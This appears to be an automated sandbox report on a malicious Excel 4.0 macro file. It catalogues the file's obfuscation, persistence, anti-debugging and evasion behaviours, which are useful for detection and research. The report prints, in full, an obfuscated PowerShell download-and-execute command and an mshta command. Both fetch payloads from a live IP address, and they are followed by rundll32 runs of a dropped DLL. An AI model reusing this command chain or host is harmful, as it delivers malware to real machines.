Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: 476C.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_038808D0 push 8B49032Eh; iretd 4_3_038808D5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_038800BE push 8B49032Eh; iretd 4_3_038800C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10032B7D push ecx; ret 12_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10030DFF push ecx; ret 12_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x9130d

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100134F0 IsIconic, 12_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 12_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 1976 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00694087 mov eax, dword ptr fs:[00000030h] 9_2_00694087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384087 mov eax, dword ptr fs:[00000030h] 10_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h] 12_2_001C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00234087 mov eax, dword ptr fs:[00000030h] 13_2_00234087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00314087 mov eax, dword ptr fs:[00000030h] 14_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00404087 mov eax, dword ptr fs:[00000030h] 15_2_00404087
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 12_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 12_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_1003ACCC

HIPS / PFW / Operating System Protection Evasion
barindex
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: CJ68000754184.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED

Language, Device and Operating System Detection
barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 12_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 12_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 12_2_10014B71
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
